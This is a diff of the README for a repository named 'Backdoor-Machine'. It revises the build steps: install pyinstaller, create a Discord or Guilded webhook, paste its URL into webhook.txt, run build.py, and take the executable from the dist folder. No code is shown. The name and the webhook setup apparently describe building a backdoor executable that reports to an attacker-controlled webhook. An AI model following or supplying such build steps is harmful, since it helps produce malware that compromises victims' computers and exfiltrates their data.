yunusborazan/Backdoor-Machine/README.md

    ```
    pip install pyinstaller
    ```
-2. Make a webhook.
+2. Make a webhook on discord or guilded and copy the url.
-3. Copy the webhook url into webhook.txt
+3. Paste the webhook url into webhook.txt
 4. Run the file "build.py"
 5. When its done, go into the "dist" directory and exe should be in there.